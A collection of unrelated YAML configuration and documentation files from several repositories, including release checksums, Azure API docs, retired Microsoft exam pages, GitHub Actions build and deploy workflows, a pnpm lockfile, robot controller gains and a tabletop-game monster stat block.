# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Darwin_x86_64.tar.gz
Darwin_x86_64: sha256:f08438b83d3059862b50f2a91af6a38c2637433822c8fe2b6a12806d423f3087
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Linux_i386.tar.gz
Linux_i386: sha256:0b09e8b4ff1d4ad93f8fcaa6d30487316962451c4e9afe8c9e2c058f54413743
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Linux_x86_64.tar.gz
Linux_x86_64: sha256:afc8fc25d0619f8d07d3cc45fa606bdeae93ef450f90366d1aba08508699b258
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_checksums.txt
'0.3.1':
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_darwin_amd64.tar.gz
darwin_amd64: sha256:769ca6e0a7e2628f5092016aebb70bae8ee69013d3f3027b82787c0041758970
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_darwin_arm64.tar.gz
darwin_arm64: sha256:3955c290c5093d10a81fa57f78954500d2c80d001992f08e77aa778075a09009
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_linux_amd64.tar.gz
linux_amd64: sha256:3cc86e5d01e66692d5d7c6a704a91bca7ae4e8bfac5679fcbb843552c95a19e6
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_linux_arm64.tar.gz
linux_arm64: sha256:5a8016b311bc6febd0cb8bfc1de9fea3cb5e5e71e844c9f9304e4dd6dba647c0
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_checksums.txt
'0.4.1':
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_darwin_amd64.tar.gz
darwin_amd64: sha256:f9ad59181474a6fdc5ba1988bd3d3523147a02994f9279aeb57158458db22a09
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_darwin_arm64.tar.gz
darwin_arm64: sha256:79624969b0129a68907bd1281718d05027bbce008189c34dac2577f266ec5bc0
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_linux_amd64.tar.gz
linux_amd64: sha256:98480917e80413b5b9886c30668aa80d7685c7972039d0aec864792521730227
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_linux_arm64.tar.gz
linux_arm64: sha256:21744a928728aec0ad8c5ce4026f3bff56d9bfb84e849f9e8a2460b56c6cb046
|
defaults/main.yml
|
uid: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel*"
fullName: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel"
name: "setOwnerLevel"
nameWithType: "ReceiveOptions.setOwnerLevel"
members:
- uid: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel(java.lang.Long)"
fullName: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel(Long priority)"
name: "setOwnerLevel(Long priority)"
nameWithType: "ReceiveOptions.setOwnerLevel(Long priority)"
summary: "Sets the `ownerLevel` value on this receive operation. When populated, the level indicates that the receive operation is intended to be the only reader of events for the requested partition and associated consumer group. To do so, this receive operation will attempt to assert ownership over the partition; in the case where there is more than one exclusive receive operation for the same partition/consumer group pair, the one having a larger <xref uid=\"com.azure.messaging.eventhubs.models.ReceiveOptions.getOwnerLevel()\" data-throw-if-not-resolved=\"false\" data-raw-source=\"ReceiveOptions#getOwnerLevel()\"></xref> value will \"win\".\n\nWhen an exclusive receive operation is used, those receive operations which are not exclusive or which have a lower priority will either not be allowed to be created. If they already exist, will encounter an exception during the next attempted operation."
parameters:
- description: "The priority associated with an exclusive receive operation; for a non-exclusive receive\n operation, this value should be <code>null</code>."
name: "priority"
type: "<xref href=\"java.lang.Long?alt=java.lang.Long&text=Long\" data-throw-if-not-resolved=\"False\" />"
syntax: "public ReceiveOptions setOwnerLevel(Long priority)"
returns:
description: "The updated <xref uid=\"com.azure.messaging.eventhubs.models.ReceiveOptions\" data-throw-if-not-resolved=\"false\" data-raw-source=\"ReceiveOptions\"></xref> object."
type: "<xref href=\"com.azure.messaging.eventhubs.models.ReceiveOptions?alt=com.azure.messaging.eventhubs.models.ReceiveOptions&text=ReceiveOptions\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.messaging.eventhubs.models"
artifact: com.azure:azure-messaging-eventhubs:5.6.0
|
docs-ref-autogen/com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel.yml
|
title: Programming in C#
metadata:
title: 'Exam 70-483: Programming in C#'
description: 'Exam 70-483: Programming in C#'
uid: exam.70-483
displayName: 70-483
summary: |+
<div><font color='red'><strong>Este exame foi reformado em 31 de janeiro de 2021. Para obter as opções disponíveis atualmente, consulte a página <a href='/learn/certifications/browse/?resource_type=examination'> Navegue pela página de Certificações e Exames</a>.<br/><br/></strong></font></div>
Os candidatos a este exame devem possuir pelo menos um ano de experiência em programação de lógica de aplicativo/negócio essencial para diversos tipos de aplicativos e plataformas de hardware/software usando C#.
Os candidatos também devem ter uma compreensão ampla do seguinte:
- Gerenciamento de fluxo e eventos de programa
- Programação assíncrona e threading
- Validação de dados e trabalhar com coleções de dados, incluindo LINQ
- Lidar com erros e exceções
- Trabalhar com matrizes e coleções
- Trabalhar com variáveis, operadores e expressões
- Trabalhar com classes e métodos
- Declarações de decisão e iteração
<div style='font-weight: bold;'><br/>Note: Existem atualizações de exame efetivas a partir 14 de dezembro de 2017. Para saber mais sobre essas alterações e como elas afetam as habilidades medidas, baixe e leia o documento de alteração do Exame 483.</div>
subTitle: Os candidatos a este exame devem possuir pelo menos um ano de experiência em programação de lógica de aplicativo/negócio essencial para diversos tipos de aplicativos e plataformas de hardware/software usando C#.
iconUrl: /media/learn/certification/badges/certification-exam.svg
pdfDownloadUrl: https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4tiMh
practiceTestUrl: https://www.mindhub.com/70-483-Programming-in-C-p/mu-70-483_p.htm?utm_source=microsoft&utm_medium=certpage&utm_campaign=msofficialpractice
locales:
- en
- zh-cn
- zh-tw
- fr
- de
- ja
- pt-br
levels:
- intermediate
skills:
- Gerenciar fluxo de programa (25-30%)
- Criar e usar tipos (25-30%)
- Depurar aplicativos e implementar segurança (25-30%)
- Implementar acesso aos dados (25-30%)
retirementDate: 01/31/2021
roles:
- developer
products:
- vs
courses:
- uid: course.20483
relatedCertifications:
- related:
uid: certification.mcsa-universal-windows-platform
- related:
uid: certification.mcsa-web-applications-certification
resources:
- title: Exam Replay
description: Veja duas grandes ofertas para ajudar a aumentar suas chances de sucesso.
href: ../deals.md
- title: Painel de certificação
description: Revise e gerencie seus compromissos, certificados e transcrições agendados.
href: https://www.microsoft.com/learning/dashboard.aspx
- title: Solicitar acomodações
description: Saiba mais sobre a solicitação de uma acomodação para realizar o seu exame.
href: ../request-accommodations.md
- title: Políticas de exames e perguntas frequentes
description: Revise e gerencie seus compromissos, certificados e transcrições agendados.
href: ../certification-exam-policies.md
|
learn-certs-pr/exams/70-483.yml
|
name: CI
# Controls when the action will run. Triggers the workflow on push or pull request
# events but only for the master branch
on:
push:
branches:
- master
- develop
- develop-**
pull_request:
branches:
- master
- develop
- develop-**
env:
LANG: en_US.UTF-8
BSDiff_WORKSPACE: "BSDiff.xcworkspace"
BSDiff_PROJECT: "BSDiff.xcodeproj"
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
Cocoapods_Lint:
runs-on: macos-10.15
steps:
- uses: actions/checkout@v2
with:
ref: ${{ github.sha }}
- name: cocoapods_lint
run: pod lib lint --allow-warnings --verbose
Carthage_Lint:
runs-on: macos-10.15
steps:
- uses: actions/checkout@v2
with:
ref: ${{ github.sha }}
- name: carthage_lint
run: |
export XCODE_XCCONFIG_FILE=$PWD/fix_carthage_xcode_12.xcconfig
carthage build --no-skip-current
Build_Examples:
runs-on: macos-10.15
strategy:
matrix:
sdk: [ iOS13.3, iOS13.4 ]
include:
- sdk: iOS13.3
developer_dir: /Applications/Xcode_11.3.1.app
destination: OS=13.3,name=iPhone 11 Pro Max
scheme: BSDiffExample
- sdk: iOS13.4
developer_dir: /Applications/Xcode_11.4.app
destination: OS=13.4.1,name=iPhone 11 Pro Max
scheme: BSDiffExample
steps:
- uses: actions/checkout@v2
with:
ref: ${{ github.sha }}
- name: bundle_install
run: |
xcrun simctl list
bundle install
pod install
- name: build_examples
env:
DEVELOPER_DIR: ${{ matrix.developer_dir }}
run: |
echo ""
set -o pipefail
xcodebuild -version -sdk
xcodebuild build -workspace "${{ env.BSDiff_WORKSPACE }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" ONLY_ACTIVE_ARCH=NO CODE_SIGNING_REQUIRED=NO | bundle exec xcpretty -c;
Unit_Tests:
runs-on: macos-10.15
strategy:
matrix:
sdk: [iOS13.3]
include:
- sdk: iOS13.3
developer_dir: /Applications/Xcode_11.3.1.app
destination: OS=13.3,name=iPhone 11 Pro Max
scheme: BSDiff
steps:
- uses: actions/checkout@v2
with:
ref: ${{ github.sha }}
- name: bundle_install
run: |
xcrun simctl list
bundle install
- name: unit_tests
env:
DEVELOPER_DIR: ${{ matrix.developer_dir }}
run: |
set -o pipefail
xcodebuild build build-for-testing -project "${{ env.BSDiff_PROJECT }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" -configuration Debug ONLY_ACTIVE_ARCH=NO CODE_SIGNING_REQUIRED=NO GCC_INSTRUMENT_PROGRAM_FLOW_ARCS=YES GCC_GENERATE_TEST_COVERAGE_FILES=YES ONLY_ACTIVE_ARCH=YES | bundle exec xcpretty -c;
xcodebuild analyze test-without-building -project "${{ env.BSDiff_PROJECT }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" -configuration Debug ONLY_ACTIVE_ARCH=NO CODE_SIGNING_REQUIRED=NO GCC_INSTRUMENT_PROGRAM_FLOW_ARCS=YES GCC_GENERATE_TEST_COVERAGE_FILES=YES ONLY_ACTIVE_ARCH=YES | bundle exec xcpretty -c;
- uses: codecov/codecov-action@v1
|
.github/workflows/ci.yml
|
---
- description:
buttons: submit,cancel
label: Rubrik - Select SLA Domain
blueprint_id:
dialog_tabs:
- description:
display: edit
label: SLA Domain
display_method:
display_method_options:
position: 0
dialog_groups:
- description:
display: edit
label: SLA Domain
display_method:
display_method_options:
position: 0
dialog_fields:
- name: current_site_label
description:
type: DialogFieldTextBox
data_type: string
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: false
required_method:
required_method_options: {}
default_value: ''
values: []
values_method:
values_method_options: {}
options:
:protected: false
label: 'Current Rubrik Site:'
position: 0
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: true
auto_refresh:
trigger_auto_refresh:
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Integration/VMware
ae_class: DynamicLabels
ae_instance: GetCurrentRubrikSite
ae_message:
ae_attributes: {}
- name: current_sla_label
description:
type: DialogFieldTextBox
data_type: string
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: false
required_method:
required_method_options: {}
default_value: ''
values: []
values_method:
values_method_options: {}
options:
:protected: false
label: 'Current SLA Domain:'
position: 1
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: true
auto_refresh:
trigger_auto_refresh:
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Integration/VMware
ae_class: DynamicLabels
ae_instance: GetCurrentRubrikSla
ae_message:
ae_attributes: {}
- name: select_rubrik_site
description:
type: DialogFieldDropDownList
data_type:
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: true
required_method:
required_method_options: {}
default_value:
values: []
values_method:
values_method_options: {}
options:
:force_multi_value: false
label: 'Select New Rubrik Site:'
position: 2
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: false
auto_refresh: true
trigger_auto_refresh: true
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: System
ae_class: Request
ae_instance: QueryConfiguredClusters
ae_message:
ae_attributes: {}
- name: sla_domain_list
description:
type: DialogFieldDropDownList
data_type:
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: true
required_method:
required_method_options: {}
default_value:
values: []
values_method:
values_method_options: {}
options:
:force_multi_value: false
label: 'Select New SLA Domain:'
position: 3
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button: false
load_values_on_init: true
read_only: false
auto_refresh: true
trigger_auto_refresh: true
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Workflows
ae_class: SlaDomains
ae_instance: DropDown_QuerySlaDomains
ae_message:
ae_attributes: {}
|
service_dialogs/Rubrik_-_Select_SLA_Domain.yml
|
lockfileVersion: 5.3
specifiers:
sass: ^1.50.0
dependencies:
sass: 1.50.0
packages:
/anymatch/3.1.2:
resolution: {integrity: sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==}
engines: {node: '>= 8'}
dependencies:
normalize-path: 3.0.0
picomatch: 2.3.1
dev: false
/binary-extensions/2.2.0:
resolution: {integrity: sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==}
engines: {node: '>=8'}
dev: false
/braces/3.0.2:
resolution: {integrity: sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==}
engines: {node: '>=8'}
dependencies:
fill-range: 7.0.1
dev: false
/chokidar/3.5.3:
resolution: {integrity: sha512-Dr3sfKRP6oTcjf2JmUmFJfeVMvXBdegxB0iVQ5eb2V10uFJUCAS8OByZdVAyVb8xXNz3GjjTgj9kLWsZTqE6kw==}
engines: {node: '>= 8.10.0'}
dependencies:
anymatch: 3.1.2
braces: 3.0.2
glob-parent: 5.1.2
is-binary-path: 2.1.0
is-glob: 4.0.3
normalize-path: 3.0.0
readdirp: 3.6.0
optionalDependencies:
fsevents: 2.3.2
dev: false
/fill-range/7.0.1:
resolution: {integrity: sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==}
engines: {node: '>=8'}
dependencies:
to-regex-range: 5.0.1
dev: false
/fsevents/2.3.2:
resolution: {integrity: sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==}
engines: {node: ^8.16.0 || ^10.6.0 || >=11.0.0}
os: [darwin]
requiresBuild: true
dev: false
optional: true
/glob-parent/5.1.2:
resolution: {integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==}
engines: {node: '>= 6'}
dependencies:
is-glob: 4.0.3
dev: false
/immutable/4.0.0:
resolution: {integrity: sha512-zIE9hX70qew5qTUjSS7wi1iwj/l7+m54KWU247nhM3v806UdGj1yDndXj+IOYxxtW9zyLI+xqFNZjTuDaLUqFw==}
dev: false
/is-binary-path/2.1.0:
resolution: {integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==}
engines: {node: '>=8'}
dependencies:
binary-extensions: 2.2.0
dev: false
/is-extglob/2.1.1:
resolution: {integrity: sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=}
engines: {node: '>=0.10.0'}
dev: false
/is-glob/4.0.3:
resolution: {integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==}
engines: {node: '>=0.10.0'}
dependencies:
is-extglob: 2.1.1
dev: false
/is-number/7.0.0:
resolution: {integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==}
engines: {node: '>=0.12.0'}
dev: false
/normalize-path/3.0.0:
resolution: {integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==}
engines: {node: '>=0.10.0'}
dev: false
/picomatch/2.3.1:
resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==}
engines: {node: '>=8.6'}
dev: false
/readdirp/3.6.0:
resolution: {integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==}
engines: {node: '>=8.10.0'}
dependencies:
picomatch: 2.3.1
dev: false
/sass/1.50.0:
resolution: {integrity: sha512-cLsD6MEZ5URXHStxApajEh7gW189kkjn4Rc8DQweMyF+o5HF5nfEz8QYLMlPsTOD88DknatTmBWkOcw5/LnJLQ==}
engines: {node: '>=12.0.0'}
hasBin: true
dependencies:
chokidar: 3.5.3
immutable: 4.0.0
source-map-js: 1.0.2
dev: false
/source-map-js/1.0.2:
resolution: {integrity: sha512-R0XvVJ9WusLiqTCEiGCmICCMplcCkIwwR11mOSD9CR5u+IXYdiseeEuXCVAjS54zqwkLcPNnmU4OeJ6tUrWhDw==}
engines: {node: '>=0.10.0'}
dev: false
/to-regex-range/5.0.1:
resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==}
engines: {node: '>=8.0'}
dependencies:
is-number: 7.0.0
dev: false
|
pnpm-lock.yaml
|
joint_state_controller:
type: joint_state_controller/JointStateController
publish_rate: 100
panda_joint_trajectory_controller:
type: velocity_controllers/JointTrajectoryController
joints:
- panda_joint1
- panda_joint2
- panda_joint3
- panda_joint4
- panda_joint5
- panda_joint6
- panda_joint7
gains:
panda_joint1: { p: 10000.0, i: 1.0, d: 1000.0, i_clamp: 10 }
panda_joint2: { p: 100.0, i: 0.1, d: 20.0, i_clamp: 1.0 }
panda_joint3: { p: 500.0, i: 0.01, d: 10.0, i_clamp: 0.1 }
panda_joint4: { p: 400.0, i: 0.0, d: 10.0, i_clamp: 0.0 }
panda_joint5: { p: 6.5, i: 0.0, d: 0.01, i_clamp: 0.0 }
panda_joint6: { p: 8.0, i: 0.0, d: 0.01, i_clamp: 0.0 }
panda_joint7: { p: 12.0, i: 0.0, d: 0.1, i_clamp: 0.0 }
constraints:
goal_time: 2.0
panda_joint1: {goal: 0.02}
panda_joint2: {goal: 0.02}
panda_joint3: {goal: 0.02}
panda_joint4: {goal: 0.02}
panda_joint5: {goal: 0.02}
panda_joint6: {goal: 0.02}
panda_joint7: {goal: 0.02}
state_publish_rate: 100
panda_joint1_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint1
pid: {p: 10.0, i: 0, d: 0.1, i_clamp: 0}
panda_joint2_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint2
pid: {p: 100.0, i: 0, d: 1.0, i_clamp: 0}
panda_joint3_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint3
pid: {p: 500.0, i: 0, d: 0.3, i_clamp: 0}
panda_joint4_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint4
pid: {p: 100.0, i: 0.0, d: 0.1}
panda_joint5_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint5
pid: {p: 6.5, i: 0.0, d: 0.01}
panda_joint6_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint6
pid: {p: 8.0, i: 0.0, d: 0.01}
panda_joint7_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint7
pid: {p: 12.0, i: 0.0, d: 0.1}
panda_joint1_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint1
panda_joint2_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint2
panda_joint3_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint3
panda_joint4_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint4
panda_joint5_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint5
panda_joint6_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint6
panda_joint7_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint7
panda_hand_controller:
type: velocity_controllers/JointTrajectoryController
joints:
- panda_finger_joint1
- panda_finger_joint2
gains:
panda_finger_joint1: { p: 5, d: 3.0, i: 0, i_clamp: 1 }
panda_finger_joint2: { p: 5, d: 1.0, i: 0, i_clamp: 1 }
state_publish_rate: 25
|
param/panda_control.yaml
|
name: <NAME>
slug_name: rath-modar
challenge_rating: 6.0
experience: 2300
size: Medium
type: humanoid
subtype: human
alignment: lawful evil
armor_class: 13
armor_class_type: 16 with mage armor
hit_points: 71
hit_dice: 11d8+22
speed: 30 ft.
strength: 11
dexterity: 16
constitution: 14
intelligence: 18
wisdom: 14
charisma: 10
saving_throws: Int +7, Wis +5
skills: Arcana +7, Deception +3, Insight +5, Stealth +6
senses:
languages: Common, Draconic, Infernal, Primordial, Thayan
damage_resistances:
damage_immunities:
damage_vulnerabilities:
condition_immunities:
special_abilities:
- name: Special Equipment
description: Rath has a staff of fire, and scrolls of dimension door, feather fall, and fireball.
actions:
- name: Quarterstaff
description: "Melee Weapon Attack: +4 to hit, reach 5 ft., one target. Hit: 4 (1d8) bludgeoning damage.\n\n**Reactions**"
- name: Illusory Self (Recharges on a Short or Long Rest)
description: When a creature Rath can see makes an attack roll against him, he can interpose an illusory duplicate between the attacker and him. The attack automatically misses Rath, then the illusion dissipates.
spell_casting:
- title: Spellcasting
top_description: 'Rath is an 11th-level spellcaster who uses Intelligence as his spellcasting ability (spell save DC 15, +7 to hit with spell attacks). Rath has the following spells prepared from the wizard spell list:'
bottom_description: ''
spell_list:
- title: Cantrips (at will)
spells:
- name: fire bolt
slug_name: fire-bolt
- name: minor illusion
slug_name: minor-illusion
- name: prestidigitation
slug_name: prestidigitation
- name: shocking grasp
slug_name: shocking-grasp
- title: 1st level (4 slots)
spells:
- name: chromatic orb
slug_name: chromatic-orb
- name: color spray
slug_name: color-spray
- name: mage armor
slug_name: mage-armor
- name: magic missile
slug_name: magic-missile
- title: 2nd level (3 slots)
spells:
- name: detect thoughts
slug_name: detect-thoughts
- name: mirror image
slug_name: mirror-image
- name: phantasmal force
slug_name: phantasmal-force
- title: 3rd level (3 slots)
spells:
- name: counterspell
slug_name: counterspell
- name: fireball
slug_name: fireball
- name: major image
slug_name: major-image
- title: 4th level (3 slots)
spells:
- name: confusion
slug_name: confusion
- name: greater invisibility
slug_name: greater-invisibility
- title: 5th level (2 slots)
spells:
- name: mislead
slug_name: mislead
- name: seeming
slug_name: seeming
- title: 6th level (1 slot)
spells:
- name: globe of invulnerability
slug_name: globe-of-invulnerability
|
data/monsters/rath-modar.yaml
|
title: Documentatie over Ansible op Azure
summary: Leer Ansible gebruiken om cloudinrichting, configuratiebeheer en toepassingsimplementaties te automatiseren.
metadata:
title: Documentatie over Ansible op Azure
description: Leer Ansible gebruiken om cloudinrichting, configuratiebeheer en toepassingsimplementaties te automatiseren.
services: azure
ms.service: ansible
ms.topic: landing-page
author: TomArcherMsft
ms.author: tarcher
ms.date: 09/11/2019
ms.openlocfilehash: ccdf9055fbdb72f0f0059d9bfe27bee41952446e
ms.sourcegitcommit: bb65043d5e49b8af94bba0e96c36796987f5a2be
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 10/16/2019
ms.locfileid: "72389008"
landingContent:
- title: Over Ansible op Azure
linkLists:
- linkListType: overview
links:
- text: Over Ansible op Azure
url: ansible-overview.md
- linkListType: reference
links:
- text: Versies en functies
url: ./ansible-matrix.md
- text: Alle modules voor Azure
url: https://docs.ansible.com/ansible/latest/modules/list_of_cloud_modules#azure
- title: Ansible installeren en configureren
linkLists:
- linkListType: quickstart
links:
- text: Ansible-oplossingssjabloon implementeren in CentOS
url: ansible-deploy-solution-template.md
- text: Ansible installeren in virtuele Linux-machines
url: /azure/virtual-machines/linux/ansible-install-configure
- text: Playbooks uitvoeren in Cloud Shell
url: ansible-run-playbook-in-cloudshell.md
- linkListType: tutorial
links:
- text: Een dynamische voorraad configureren
url: ansible-manage-azure-dynamic-inventories.md
- linkListType: download
links:
- text: Visual Studio Code-extensie voor Ansible
url: https://marketplace.visualstudio.com/items?itemName=vscoss.vscode-ansible
- title: Virtuele Linux-machines beheren
linkLists:
- linkListType: quickstart
links:
- text: Virtuele Linux-machines configureren
url: /azure/virtual-machines/linux/ansible-create-vm?toc=%2Fen-us%2Fazure%2Fansible%2Ftoc.json&bc=%2Fen-us%2Fazure%2Fbread%2Ftoc.json
- text: Virtuele Linux-machines beheren
url: /azure/virtual-machines/linux/ansible-manage-linux-vm?toc=%2Fen-us%2Fazure%2Fansible%2Ftoc.json&bc=%2Fen-us%2Fazure%2Fbread%2Ftoc.json
- text: Maken vanuit een galerie met gedeelde installatiekopieën
url: ansible-vm-create-from-shared-generalized-image.md
- title: Schaalsets voor virtuele machines beheren
linkLists:
- linkListType: tutorial
links:
- text: Schaalsets voor virtuele machines configureren
url: ansible-create-configure-vmss.md
- text: Toepassingen implementeren in schaalsets voor virtuele machines
url: ansible-deploy-app-vmss.md
- text: De schaal van een schaalset voor virtuele machines automatisch aanpassen
url: ansible-auto-scale-vmss.md
- text: Aangepaste installatiekopie bijwerken
url: ansible-vmss-update-image.md
- text: Maken vanuit een galerie met gedeelde installatiekopieën
url: ansible-vm-create-from-shared-generalized-image.md
- title: Virtuele netwerken beheren
linkLists:
- linkListType: tutorial
links:
- text: Peering configureren
url: ansible-vnet-peering-configure.md
- text: Routetabellen configureren
url: ansible-create-configure-route-table.md
- title: AKS beheren
linkLists:
- linkListType: tutorial
links:
- text: AKS-clusters configureren
url: ansible-create-configure-aks.md
- text: Azure CNI-netwerken configureren
url: ansible-aks-configure-cni-networking.md
- text: Kubenet-netwerken configureren
url: ansible-aks-configure-kubenet-networking.md
- text: RBAC-rollen in AKS-cluster configureren
url: ansible-aks-configure-rbac.md
|
articles/ansible/index.yml
|
name: Build And Deploy
on:
push:
tags:
- 'v*'
jobs:
build-and-deploy:
runs-on: ubuntu-latest
steps:
- name: Set up Go
uses: actions/setup-go@master
with:
go-version: 1.14
- name: Set up Node
uses: actions/setup-node@master
- name: Check out code
uses: actions/checkout@master
- name: Build
run: |
make build_server
make build_client
tar -zcvf release.tgz output
- name: Create release
id: create_release
uses: actions/create-release@master
env:
GITHUB_TOKEN: ${{ secrets.TOKEN }}
with:
tag_name: ${{ github.ref }}
release_name: Release ${{ github.ref }}
draft: false
prerelease: false
- name: Upload release asset
uses: actions/upload-release-asset@master
env:
GITHUB_TOKEN: ${{ secrets.TOKEN }}
with:
upload_url: ${{ steps.create_release.outputs.upload_url }}
asset_path: ./release.tgz
asset_name: release.tgz
asset_content_type: application/x-tgz
- name: Deploy
uses: appleboy/ssh-action@master
with:
host: ${{ secrets.HOST }}
username: ${{ secrets.USERNAME }}
password: ${{ secrets.PASSWORD }}
command_timeout: 30m
script: |
mkdir -p ~/release
mkdir -p ~/chaosi/server/daily-problem
mkdir -p /usr/local/nginx/html/daily-problem
cd ~/release
while :
do
wget --no-check-certificate http://github.com/chaosi-zju/daily-problem/releases/latest/download/release.tgz -O daily-problem.tgz
(( i++ ))
if [ `ls -l daily-problem.tgz | awk '{print $5}'` -gt 100 ]; then break;
elif [ $i -gt 10 ]; then exit 1;
fi
done
tar -zxvf daily-problem.tgz
systemctl disable daily_problem.service
systemctl stop daily_problem.service
systemctl disable note.service
systemctl stop note.service
cp -rf output/server/* ~/chaosi/server/daily-problem/
cp -rf output/dist/* /usr/local/nginx/html/daily-problem/
cp -rf output/daily_problem.service /etc/systemd/system/
cp -rf output/note ~/chaosi/server/
cp -rf output/note.service /etc/systemd/system/
export MYSQL_HOST=${{ secrets.MYSQL_HOST }} MYSQL_USER=${{ secrets.MYSQL_USER }} MYSQL_PASSWD=${{ secrets.MYSQL_PASSWD }}
cd ~/chaosi/server/daily-problem && envsubst < config_prod_temp.yaml > config_prod.yaml && cd -
systemctl enable daily_problem.service
systemctl start daily_problem.service
systemctl enable note.service
systemctl start note.service
if [ -d outout ]; then rm -r output; fi
systemctl status daily_problem.service | grep -C 20 "Active: active (running)"
if [ $? == 0 ]; then exit 0; else exit 1; fi
|
.github/workflows/deploy.yml
|
title: Designing Database Solutions for Microsoft SQL Server
metadata:
title: 'Exam 70-465: Designing Database Solutions for Microsoft SQL Server'
description: 'Exam 70-465: Designing Database Solutions for Microsoft SQL Server'
uid: exam.70-465
displayName: 70-465
summary: |-
<div><font color='red'><strong>Questo esame è stato rimosso il 31 gennaio 2021. Per le opzioni attualmente disponibili, consulta <a href='/learn/certifications/browse/?resource_type=examination'>Pagina Esplora le Certificazioni e gli Esami</a>.<br/><br/></strong></font></div>
